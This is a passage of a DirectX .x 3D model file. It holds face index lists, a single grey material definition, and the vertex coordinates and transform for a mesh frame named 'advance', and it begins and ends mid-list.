4;366,367,409,410;, 4;367,368,408,409;, 5;369,370,407,408,368;, 4;370,371,406,407;, 4;364,295,296,365;, 4;363,294,295,364;, 4;362,293,294,363;, 4;361,292,293,362;, 4;360,291,292,361;, 4;359,290,291,360;, 4;358,289,290,359;, 4;357,288,289,358;, 4;356,287,288,357;, 4;355,286,287,356;, 4;354,353,286,355;, 4;387,318,319,388;, 4;386,317,318,387;, 4;385,316,317,386;, 4;384,315,316,385;, 4;383,314,315,384;, 4;382,313,314,383;, 4;381,312,313,382;, 4;380,311,312,381;, 4;379,310,311,380;, 4;378,309,310,379;, 4;377,308,309,378;, 4;376,307,308,377;, 4;375,306,307,376;, 4;374,305,306,375;, 4;373,304,305,374;, 4;372,303,304,373;, 4;371,302,303,372;, 4;370,301,302,371;, 4;369,300,301,370;, 4;368,299,300,369;, 4;367,298,299,368;, 4;366,297,298,367;, 4;365,296,297,366;, 4;303,302,337,336;, 4;304,303,336,335;, 4;305,304,335,334;, 4;306,305,334,333;, 4;307,306,333,332;, 4;308,307,332,331;, 4;309,308,331,330;, 4;310,309,330,329;, 4;311,310,329,328;, 4;312,311,328,327;, 3;326,312,327;, 4;313,312,326,325;, 4;314,313,325,324;, 4;315,314,324,323;, 4;316,315,323,322;, 4;317,316,322,321;, 5;318,317,321,320,319;, 4;302,301,338,337;, 5;300,299,339,338,301;, 4;299,298,340,339;, 4;298,297,341,340;, 4;412,343,344,413;, 4;413,344,345,414;, 4;414,345,346,415;, 4;415,346,347,416;, 4;416,347,348,417;, 4;417,348,349,418;, 4;418,349,350,419;, 4;419,350,351,420;, 4;420,351,352,421;, 4;411,342,343,412;, 4;410,341,342,411;, 4;409,340,341,410;, 4;408,339,340,409;, 4;407,338,339,408;, 4;406,337,338,407;, 4;405,336,337,406;, 4;404,335,336,405;, 4;403,334,335,404;, 4;402,333,334,403;, 4;401,332,333,402;, 4;400,331,332,401;, 4;399,330,331,400;, 4;398,329,330,399;, 4;397,328,329,398;, 4;396,327,328,397;, 4;395,326,327,396;, 4;394,325,326,395;, 4;393,324,325,394;, 4;392,323,324,393;, 4;391,322,323,392;, 4;390,321,322,391;, 4;389,320,321,390;, 3;342,296,343;, 4;296,295,344,343;, 4;295,294,345,344;, 4;294,293,346,345;, 4;293,292,347,346;, 4;292,291,348,347;, 4;291,290,349,348;, 4;290,289,350,349;, 4;289,288,351,350;, 6;288,287,286,353,352,351;, 4;478,423,424,479;, 4;479,424,425,480;, 4;480,425,426,481;, 4;481,426,427,482;, 4;482,427,428,483;, 4;483,428,429,484;, 4;484,429,430,485;, 4;485,430,431,486;, 4;486,431,432,487;, 4;487,432,433,488;, 4;488,433,434,489;, 4;489,434,435,490;, 4;490,435,436,491;, 4;491,436,437,492;, 4;492,437,438,493;, 4;493,438,439,494;, 4;494,439,440,495;, 4;495,440,441,496;, 4;496,441,442,497;, 4;497,442,443,498;, 4;498,443,444,499;, 4;499,444,445,500;, 4;500,445,446,501;, 4;501,446,447,502;, 4;502,447,448,503;, 4;503,448,449,504;, 4;476,477,528,529;, 4;479,528,477,478;, 3;480,528,479;, 3;481,528,480;, 4;527,528,481,482;, 3;483,527,482;, 4;526,527,483,484;, 4;525,526,484,485;, 4;524,525,485,486;, 4;523,524,486,487;, 5;522,523,487,488,521;, 4;520,521,488,489;, 5;519,520,489,490,518;, 4;517,518,490,491;, 4;516,517,491,492;, 4;515,516,492,493;, 3;494,515,493;, 4;514,515,494,495;, 4;513,514,495,496;, 4;512,513,496,497;, 4;511,512,497,498;, 4;510,511,498,499;, 4;509,510,499,500;, 4;508,509,500,501;, 4;507,508,501,502;, 4;506,507,502,503;, 4;505,506,503,504;, 4;474,473,422,475;, 4;423,422,473,424;, 3;424,473,425;, 3;425,473,426;, 4;473,472,427,426;, 3;427,472,428;, 4;472,471,429,428;, 4;471,470,430,429;, 4;470,469,431,430;, 4;469,468,432,431;, 5;467,466,433,432,468;, 4;466,465,434,433;, 5;464,463,435,434,465;, 4;463,462,436,435;, 4;462,461,437,436;, 4;461,460,438,437;, 3;438,460,439;, 4;460,459,440,439;, 4;459,458,441,440;, 4;458,457,442,441;, 4;457,456,443,442;, 4;456,455,444,443;, 4;455,454,445,444;, 4;454,453,446,445;, 4;453,452,447,446;, 4;452,451,448,447;, 4;449,448,451,450;, 4;527,472,473,528;, 4;526,471,472,527;, 4;525,470,471,526;, 4;524,469,470,525;, 4;523,468,469,524;, 4;522,467,468,523;, 4;521,466,467,522;, 4;520,465,466,521;, 4;519,464,465,520;, 4;518,463,464,519;, 4;517,462,463,518;, 4;516,461,462,517;, 4;515,460,461,516;, 4;514,459,460,515;, 4;513,458,459,514;, 4;512,457,458,513;, 4;511,456,457,512;, 4;510,455,456,511;, 4;509,454,455,510;, 4;508,453,454,509;, 4;507,452,453,508;, 4;506,451,452,507;, 4;505,450,451,506;, 4;544,545,553,554;, 4;545,556,550,553;, 4;545,546,555,556;, 3;546,547,555;, 4;547,548,557,555;, 3;548,549,557;, 4;556,557,549,550;, 4;553,550,551,552;, 4;538,530,540,539;, 5;535,530,538,537,536;, 6;532,531,530,535,534,533;, 4;568,569,566,567;, 3;565,566,569;, 4;571,565,569,570;, 4;559,558,561,560;, 3;558,564,561;, 4;562,561,564,563;, 4;591,584,585,593;, 4;584,591,590,583;, 4;589,590,591,592;, 4;592,587,588,589;, 4;592,593,586,587;, 3;585,586,593;, 4;578,573,572,579;, 4;577,574,573,578;, 4;574,577,576,575;, 4;19,14,17,18;, 4;16,17,14,15;, 4;11,10,13,12;, 4;8,13,10,9;, 4;30,31,28,29;, 3;27,28,31;, 4;33,27,31,32;, 3;20,26,23;, 4;24,23,26,25;, 4;57,46,55,56;, 4;46,47,54,55;, 3;54,47,51;, 4;53,54,51,52;, 3;51,47,50;, 4;43,42,45,44;, 3;41,45,42;, 3;38,45,41;, 4;34,45,38,37;, 4;35,34,37,36;, 4;39,38,41,40;; MeshMaterialList { 1; 582; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.784314;0.784314;0.784314;1.0;; 60.0; 0.784314;0.784314;0.784314;; 0.498039;0.498039;0.498039;; } # Material } # MeshMaterialList } # Mesh } # Frame _words Frame _advance { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh advance { 511; -0.361103;0.457734;-1.431486;, -0.354873;0.465590;-1.432069;, -0.353868;0.465590;-1.421924;, -0.360092;0.457734;-1.421307;, -0.351699;0.462255;-1.437505;, -0.357409;0.455049;-1.436939;, -0.349559;0.451600;-1.437720;, -0.346113;0.455949;-1.438060;, -0.366338;0.440169;-1.430982;, -0.364594;0.449755;-1.431153;, -0.363583;0.449755;-1.420971;, -0.365326;0.440169;-1.420799;, -0.360322;0.448388;-1.436650;, -0.361923;0.439478;-1.436491;, -0.353437;0.439478;-1.437333;, -0.352471;0.444939;-1.437429;, -0.364594;0.419391;-1.431153;, -0.366338;0.428977;-1.430982;, -0.365326;0.428977;-1.420799;, -0.363583;0.419391;-1.420971;, -0.361923;0.429669;-1.436491;, -0.360322;0.420758;-1.436650;, -0.352471;0.424206;-1.437429;, -0.353437;0.429669;-1.437333;, -0.354873;0.403556;-1.432069;, -0.361103;0.411412;-1.431486;, -0.360092;0.411412;-1.421307;, -0.353868;0.403556;-1.421924;, -0.357409;0.414097;-1.436939;, -0.351699;0.406891;-1.437505;, -0.346113;0.413196;-1.438060;, -0.349559;0.417545;-1.437720;, -0.330247;0.391954;-1.434345;, -0.345900;0.395822;-1.432826;, -0.344892;0.395822;-1.422680;, -0.329245;0.391954;-1.424233;, -0.344224;0.400439;-1.438249;, -0.329556;0.396892;-1.439706;, -0.329556;0.404604;-1.439706;, -0.338636;0.406743;-1.438803;, -0.292274;0.395822;-1.438148;, -0.307918;0.391954;-1.436562;, -0.306913;0.391954;-1.426451;, -0.291268;0.395822;-1.428003;, -0.309651;0.396892;-1.441681;, -0.294982;0.400439;-1.443137;, -0.300571;0.406743;-1.442582;, -0.309651;0.404604;-1.441681;, -0.277104;0.411412;-1.439827;, -0.283325;0.403556;-1.439171;, -0.282320;0.403556;-1.429027;, -0.276093;0.411412;-1.429646;, -0.287507;0.406891;-1.443879;, -0.281797;0.414097;-1.444446;, -0.289649;0.417545;-1.443667;, -0.293094;0.413196;-1.443324;, -0.271872;0.428977;-1.440361;, -0.273614;0.419391;-1.440185;, -0.272605;0.419391;-1.430004;, -0.270860;0.428977;-1.430176;, -0.278883;0.420758;-1.444734;, -0.277285;0.429669;-1.444894;, -0.285769;0.429669;-1.444051;, -0.286735;0.424206;-1.443955;, -0.273614;0.449755;-1.440185;, -0.271872;0.440169;-1.440361;, -0.270860;0.440169;-1.430176;, -0.272605;0.449755;-1.430004;, -0.277285;0.439478;-1.444894;, -0.278883;0.448388;-1.444734;, -0.286735;0.444939;-1.443955;, -0.285769;0.439478;-1.444051;, -0.283325;0.465590;-1.439171;, -0.277104;0.457734;-1.439827;, -0.276093;0.457734;-1.429646;, -0.282320;0.465590;-1.429027;, -0.281797;0.455049;-1.444446;, -0.287507;0.462255;-1.443879;, -0.293094;0.455949;-1.443324;, -0.289649;0.451600;-1.443667;, -0.329556;0.472254;-1.439706;, -0.344224;0.468707;-1.438249;, -0.338636;0.462403;-1.438803;, -0.329556;0.464542;-1.439706;, -0.345900;0.473324;-1.432826;, -0.330247;0.477192;-1.434345;, -0.329245;0.477192;-1.424233;, -0.344892;0.473324;-1.422680;, -0.307918;0.477192;-1.436562;, -0.292274;0.473324;-1.438148;, -0.291268;0.473324;-1.428003;, -0.306913;0.477192;-1.426451;, -0.294982;0.468707;-1.443137;, -0.309651;0.472254;-1.441681;, -0.309651;0.464542;-1.441681;, -0.300571;0.462403;-1.442582;, -0.359075;0.459382;-1.384863;, -0.352525;0.467631;-1.385478;, -0.357627;0.474717;-1.372203;, -0.366705;0.463276;-1.371337;, -0.351172;0.465590;-1.394783;, -0.357394;0.457734;-1.394128;, -0.358403;0.457734;-1.404309;, -0.352179;0.465590;-1.404926;, -0.364755;0.440595;-1.384313;, -0.362920;0.450594;-1.384492;, -0.370553;0.454488;-1.370967;, -0.373095;0.440595;-1.370716;, -0.360880;0.449755;-1.393769;, -0.362627;0.440169;-1.393593;, -0.363637;0.440169;-1.403777;, -0.361892;0.449755;-1.403951;, -0.362920;0.418552;-1.384492;, -0.364755;0.428552;-1.384313;, -0.373095;0.428552;-1.370716;, -0.370553;0.414657;-1.370967;, -0.362627;0.428977;-1.393593;, -0.360880;0.419391;-1.393769;, -0.361892;0.419391;-1.403951;, -0.363637;0.428977;-1.403777;, -0.352525;0.401513;-1.385478;, -0.359075;0.409764;-1.384863;, -0.366705;0.405870;-1.371337;, -0.357627;0.394429;-1.372203;, -0.357394;0.411412;-1.394128;, -0.351172;0.403556;-1.394783;, -0.352179;0.403556;-1.404926;, -0.358403;0.411412;-1.404309;, -0.326384;0.388959;-1.387914;, -0.342630;0.393017;-1.386333;, -0.347733;0.385932;-1.373058;, -0.325128;0.380303;-1.375271;, -0.342223;0.395822;-1.395807;, -0.326581;0.391954;-1.397394;, -0.327584;0.391954;-1.407504;, -0.343230;0.395822;-1.405950;, -0.286337;0.393017;-1.391921;, -0.302578;0.388959;-1.390278;, -0.301324;0.380303;-1.377633;, -0.278725;0.385932;-1.379910;, -0.304248;0.391954;-1.399610;, -0.288600;0.395822;-1.401130;, -0.289606;0.395822;-1.411274;, -0.305254;0.391954;-1.409721;, -0.269927;0.409764;-1.393712;, -0.276466;0.401513;-1.393028;, -0.268856;0.394429;-1.381015;, -0.259784;0.405870;-1.381951;, -0.279624;0.403556;-1.401886;, -0.273396;0.411412;-1.402467;, -0.274406;0.411412;-1.412649;, -0.280632;0.403556;-1.412029;, -0.264247;0.428552;-1.394290;, -0.266081;0.418552;-1.394106;, -0.255939;0.414657;-1.382344;, -0.253397;0.428552;-1.382600;, -0.269903;0.419391;-1.402802;, -0.268159;0.428977;-1.402971;, -0.269170;0.428977;-1.413156;, -0.270916;0.419391;-1.412983;, -0.266081;0.450594;-1.394106;, -0.264247;0.440595;-1.394290;, -0.253397;0.440595;-1.382600;, -0.255939;0.454488;-1.382344;, -0.268159;0.440169;-1.402971;, -0.269903;0.449755;-1.402802;, -0.270916;0.449755;-1.412983;, -0.269170;0.440169;-1.413156;, -0.276466;0.467631;-1.393028;, -0.269927;0.459382;-1.393712;, -0.259784;0.463276;-1.381951;, -0.268856;0.474717;-1.381015;, -0.273396;0.457734;-1.402467;, -0.279624;0.465590;-1.401886;, -0.280632;0.465590;-1.412029;, -0.274406;0.457734;-1.412649;, -0.326581;0.477192;-1.397394;, -0.342223;0.473324;-1.395807;, -0.343230;0.473324;-1.405950;, -0.327584;0.477192;-1.407504;, -0.342630;0.476129;-1.386333;, -0.326384;0.480186;-1.387914;, -0.325128;0.488843;-1.375271;, -0.347733;0.483214;-1.373058;, -0.302578;0.480186;-1.390278;, -0.286337;0.476129;-1.391921;, -0.278725;0.483214;-1.379910;, -0.301324;0.488843;-1.377633;, -0.288600;0.473324;-1.401130;, -0.304248;0.477192;-1.399610;, -0.305254;0.477192;-1.409721;, -0.289606;0.473324;-1.411274;, -0.300430;0.427507;-1.442596;, -0.299463;0.432970;-1.442692;, -0.312957;0.432970;-1.441352;, -0.299463;0.436176;-1.442692;, -0.300430;0.441639;-1.442596;, -0.312957;0.436176;-1.441352;, -0.301383;0.443814;-1.442501;, -0.304828;0.448163;-1.442160;, -0.313910;0.438351;-1.441258;, -0.307271;0.450271;-1.441916;, -0.316352;0.452410;-1.441016;, -0.316352;0.440459;-1.441016;, -0.322855;0.452410;-1.440371;, -0.331936;0.450271;-1.439468;, -0.322855;0.440459;-1.440371;, -0.334377;0.448163;-1.439226;, -0.337823;0.443814;-1.438884;, -0.325296;0.438351;-1.440128;, -0.338775;0.441639;-1.438790;, -0.339741;0.436176;-1.438693;, -0.326248;0.436176;-1.440033;, -0.339741;0.432970;-1.438693;, -0.338775;0.427507;-1.438790;, -0.326248;0.432970;-1.440033;, -0.337823;0.425332;-1.438884;, -0.334377;0.420982;-1.439226;, -0.325296;0.430794;-1.440128;, -0.331936;0.418875;-1.439468;, -0.322855;0.416735;-1.440371;, -0.322855;0.428686;-1.440371;, -0.316352;0.416735;-1.441016;, -0.307271;0.418875;-1.441916;, -0.316352;0.428686;-1.441016;, -0.304828;0.420982;-1.442160;, -0.301383;0.425332;-1.442501;, -0.313910;0.430794;-1.441258;, -0.346245;0.395822;-1.436318;, -0.330596;0.391954;-1.437838;, -0.330769;0.393600;-1.439584;, -0.345438;0.397146;-1.438129;, -0.308263;0.391954;-1.440055;, -0.292622;0.395822;-1.441642;, -0.293770;0.397146;-1.443257;, -0.308438;0.393600;-1.441800;, -0.283659;0.403556;-1.442530;, -0.277437;0.411412;-1.443185;, -0.279099;0.412088;-1.444714;, -0.284808;0.404880;-1.444147;, -0.273948;0.419391;-1.443531;, -0.272204;0.428977;-1.443708;, -0.274008;0.428977;-1.445220;, -0.275609;0.420067;-1.445060;, -0.272204;0.440169;-1.443708;, -0.273948;0.449755;-1.443531;, -0.275609;0.449079;-1.445060;, -0.274008;0.440169;-1.445220;, -0.277437;0.457734;-1.443185;, -0.283659;0.465590;-1.442530;, -0.284808;0.464264;-1.444147;, -0.279099;0.457058;-1.444714;, -0.292622;0.473324;-1.441642;, -0.308263;0.477192;-1.440055;, -0.308438;0.475545;-1.441800;, -0.293770;0.471998;-1.443257;, -0.330596;0.477192;-1.437838;, -0.346244;0.473324;-1.436318;, -0.345438;0.471998;-1.438127;, -0.330769;0.475545;-1.439584;, -0.355207;0.465590;-1.435428;, -0.361435;0.457734;-1.434847;, -0.360108;0.457058;-1.436671;, -0.354398;0.464264;-1.437238;, -0.364925;0.449755;-1.434500;, -0.366671;0.440169;-1.434330;, -0.365199;0.440169;-1.436167;, -0.363598;0.449079;-1.436324;, -0.366671;0.428977;-1.434330;, -0.364925;0.419391;-1.434500;, -0.363598;0.420067;-1.436324;, -0.365199;0.428977;-1.436167;, -0.361435;0.411412;-1.434847;, -0.355207;0.403556;-1.435428;, -0.354398;0.404880;-1.437238;, -0.360108;0.412088;-1.436671;, -0.361169;0.450169;-1.387332;, -0.363003;0.440169;-1.387153;, -0.362294;0.440169;-1.390245;, -0.360549;0.449755;-1.390422;, -0.363003;0.428977;-1.387153;, -0.361169;0.418977;-1.387332;, -0.360549;0.419391;-1.390422;, -0.362294;0.428977;-1.390245;, -0.357680;0.410998;-1.387679;, -0.351130;0.402748;-1.388294;, -0.350837;0.403556;-1.391423;, -0.357060;0.411412;-1.390769;, -0.342169;0.395015;-1.389184;, -0.325922;0.390957;-1.390765;, -0.326233;0.391954;-1.393900;, -0.341877;0.395822;-1.392313;, -0.303590;0.390957;-1.392983;, -0.287349;0.395015;-1.394626;, -0.288251;0.395822;-1.397637;, -0.303901;0.391954;-1.396117;, -0.278389;0.402748;-1.395515;, -0.271846;0.410998;-1.396199;, -0.273060;0.411412;-1.399107;, -0.279290;0.403556;-1.398526;, -0.268357;0.418977;-1.396546;, -0.266521;0.428977;-1.396731;, -0.267828;0.428977;-1.399624;, -0.269571;0.419391;-1.399454;, -0.266521;0.440169;-1.396731;, -0.268357;0.450169;-1.396546;, -0.269571;0.449755;-1.399454;, -0.267828;0.440169;-1.399624;, -0.271846;0.458148;-1.396199;, -0.278389;0.466397;-1.395515;, -0.279290;0.465590;-1.398526;, -0.273060;0.457734;-1.399107;, -0.287349;0.474131;-1.394626;, -0.303590;0.478189;-1.392983;, -0.303901;0.477192;-1.396117;, -0.288253;0.473324;-1.397637;, -0.325922;0.478189;-1.390764;, -0.342169;0.474131;-1.389184;, -0.341877;0.473324;-1.392313;, -0.326233;0.477192;-1.393900;, -0.351130;0.466397;-1.388294;, -0.357680;0.458148;-1.387679;, -0.357060;0.457734;-1.390769;, -0.350837;0.465590;-1.391423;, -0.261112;0.504810;-1.345873;, -0.289473;0.511819;-1.343057;, -0.290752;0.504161;-1.355950;, -0.268155;0.498532;-1.358226;, -0.329949;0.511819;-1.339039;, -0.358308;0.504810;-1.336224;, -0.353833;0.498532;-1.349719;, -0.331230;0.504161;-1.351932;, -0.374551;0.490791;-1.334612;, -0.385835;0.476551;-1.333491;, -0.379152;0.473073;-1.347241;, -0.370075;0.484514;-1.348108;, -0.392159;0.462089;-1.332864;, -0.395322;0.444715;-1.332548;, -0.388022;0.444715;-1.346364;, -0.385478;0.458610;-1.346613;, -0.395322;0.424431;-1.332548;, -0.392159;0.407056;-1.332864;, -0.385478;0.410535;-1.346613;, -0.388022;0.424431;-1.346364;, -0.385835;0.392593;-1.333491;, -0.374551;0.378354;-1.334612;, -0.370075;0.384633;-1.348108;, -0.379152;0.396073;-1.347241;, -0.358308;0.364336;-1.336224;, -0.329949;0.357327;-1.339039;, -0.331230;0.364985;-1.351932;, -0.353833;0.370614;-1.349719;, -0.289473;0.357327;-1.343057;, -0.261112;0.364336;-1.345873;, -0.268155;0.370614;-1.358226;, -0.290752;0.364985;-1.355950;, -0.244872;0.378354;-1.347486;, -0.233587;0.392593;-1.348606;, -0.242840;0.396073;-1.360773;, -0.251911;0.384633;-1.359839;, -0.227262;0.407056;-1.349235;, -0.224099;0.424431;-1.349547;, -0.233974;0.424431;-1.361657;, -0.236516;0.410535;-1.361401;, -0.224099;0.444715;-1.349547;, -0.227262;0.462089;-1.349235;, -0.236516;0.458610;-1.361401;, -0.233974;0.444715;-1.361657;, -0.233587;0.476551;-1.348606;, -0.244872;0.490791;-1.347486;, -0.251911;0.484514;-1.359839;, -0.242840;0.473073;-1.360773;, -0.241865;0.413742;-1.341168;, -0.239922;0.424431;-1.341362;, -0.223773;0.424431;-1.346271;, -0.226935;0.407056;-1.345959;, -0.239922;0.444715;-1.341362;, -0.241865;0.455404;-1.341168;, -0.226935;0.462089;-1.345959;, -0.223773;0.444715;-1.346271;, -0.248191;0.469866;-1.340540;, -0.255133;0.478626;-1.339851;, -0.244545;0.490791;-1.344210;, -0.233262;0.476551;-1.345331;, -0.271375;0.492644;-1.338239;, -0.288820;0.496956;-1.336507;, -0.289146;0.511819;-1.339782;, -0.260788;0.504810;-1.342597;, -0.329299;0.496956;-1.332488;, -0.346745;0.492644;-1.330756;, -0.357982;0.504810;-1.332950;, -0.329624;0.511819;-1.335763;, -0.362988;0.478626;-1.329143;, -0.369928;0.469866;-1.328455;, -0.385509;0.476551;-1.330216;, -0.374226;0.490791;-1.331336;, -0.376255;0.455404;-1.327826;, -0.378201;0.444715;-1.327633;, -0.394998;0.444715;-1.329272;, -0.391835;0.462089;-1.329588;, -0.378198;0.424431;-1.327633;, -0.376255;0.413742;-1.327826;, -0.391835;0.407056;-1.329588;, -0.394998;0.424431;-1.329272;, -0.369928;0.399279;-1.328455;, -0.362988;0.390519;-1.329143;, -0.374226;0.378354;-1.331336;, -0.385509;0.392593;-1.330216;, -0.346745;0.376501;-1.330756;, -0.329299;0.372189;-1.332488;, -0.329624;0.357327;-1.335763;, -0.357982;0.364336;-1.332950;, -0.288820;0.372189;-1.336507;, -0.271375;0.376501;-1.338239;, -0.260788;0.364336;-1.342597;, -0.289146;0.357327;-1.339782;, -0.255133;0.390519;-1.339851;, -0.248191;0.399279;-1.340540;, -0.233262;0.392593;-1.345331;, -0.244545;0.378354;-1.344210;, -0.319605;0.418392;-1.326835;, -0.313071;0.416778;-1.327483;, -0.313397;0.401915;-1.330759;, -0.330844;0.406227;-1.329028;, -0.303747;0.416778;-1.328409;, -0.297215;0.418392;-1.329057;, -0.286625;0.406227;-1.333417;, -0.304072;0.401915;-1.331685;, -0.293472;0.421622;-1.329429;, -0.290875;0.424902;-1.329686;, -0.275943;0.418216;-1.334477;, -0.282885;0.409456;-1.333789;, -0.289416;0.428235;-1.329831;, -0.288688;0.432236;-1.329904;, -0.272540;0.432236;-1.334816;, -0.274487;0.421548;-1.334622;, -0.288688;0.436908;-1.329904;, -0.289416;0.440911;-1.329831;, -0.274487;0.447598;-1.334622;, -0.272540;0.436908;-1.334816;, -0.290875;0.444243;-1.329686;, -0.293472;0.447524;-1.329429;, -0.282885;0.459689;-1.333789;, -0.275943;0.450929;-1.334477;, -0.297215;0.450754;-1.329057;, -0.303747;0.452368;-1.328409;, -0.304072;0.467231;-1.331685;, -0.286625;0.462919;-1.333417;, -0.313071;0.452368;-1.327483;, -0.319605;0.450754;-1.326835;, -0.330844;0.462919;-1.329028;, -0.313397;0.467231;-1.330759;, -0.323348;0.447524;-1.326463;, -0.325946;0.444243;-1.326205;, -0.341527;0.450929;-1.327966;, -0.334585;0.459689;-1.328656;, -0.327404;0.440911;-1.326061;, -0.328132;0.436908;-1.325988;, -0.344930;0.436908;-1.327628;, -0.342983;0.447598;-1.327823;, -0.328132;0.432236;-1.325988;, -0.327404;0.428235;-1.326061;, -0.342983;0.421548;-1.327823;, -0.344930;0.432236;-1.327628;, -0.325946;0.424902;-1.326205;, -0.323348;0.421622;-1.326463;, -0.334585;0.409456;-1.328656;, -0.341527;0.418216;-1.327966;, -0.326050;0.440911;-1.312434;, -0.326779;0.436908;-1.312362;, -0.327807;0.436908;-1.322713;, -0.327078;0.440911;-1.322784;, -0.326779;0.432236;-1.312362;, -0.326050;0.428235;-1.312434;, -0.327078;0.428235;-1.322784;, -0.327807;0.432236;-1.322713;, -0.324594;0.424902;-1.312578;, -0.321994;0.421622;-1.312836;, -0.323022;0.421622;-1.323187;, -0.325622;0.424902;-1.322930;, -0.318254;0.418392;-1.313207;, -0.311719;0.416778;-1.313857;, -0.312747;0.416778;-1.324207;, -0.319280;0.418392;-1.323559;, -0.302395;0.416778;-1.314783;, -0.295862;0.418392;-1.315430;, -0.296889;0.418392;-1.325782;, -0.303423;0.416778;-1.325134;, -0.292120;0.421622;-1.315802;, -0.290548;0.424902;-1.326411;, -0.293149;0.421622;-1.326154;, -0.288363;0.432236;-1.326628;, -0.289092;0.428235;-1.326556;, -0.289092;0.440911;-1.326556;, -0.288363;0.436908;-1.326628;, -0.289521;0.444243;-1.316060;, -0.292120;0.447524;-1.315802;, -0.293149;0.447524;-1.326154;, -0.290548;0.444243;-1.326411;, -0.295862;0.450754;-1.315430;, -0.302395;0.452368;-1.314783;, -0.303423;0.452368;-1.325134;, -0.296889;0.450754;-1.325782;, -0.311719;0.452368;-1.313857;, -0.318254;0.450754;-1.313207;, -0.319280;0.450754;-1.323559;, -0.312747;0.452368;-1.324207;, -0.321994;0.447524;-1.312836;, -0.324594;0.444243;-1.312578;, -0.325622;0.444243;-1.322930;, -0.323022;0.447524;-1.323187;; 499; 4;364,365,378,379;, 4;364,379,374,361;, 4;360,361,374,375;, 4;361,360,363,362;, 4;367,364,361,362;, 4;365,364,367,366;, 4;371,368,365,366;, 4;368,383,378,365;, 4;368,369,382,383;, 4;369,368,371,370;, 4;170,171,370,371;, 4;366,163,170,371;, 4;162,163,366,367;, 4;362,155,162,367;, 4;154,155,362,363;, 4;358,147,154,363;, 4;146,147,358,359;, 4;354,139,146,359;, 4;359,356,353,354;, 4;356,419,414,353;, 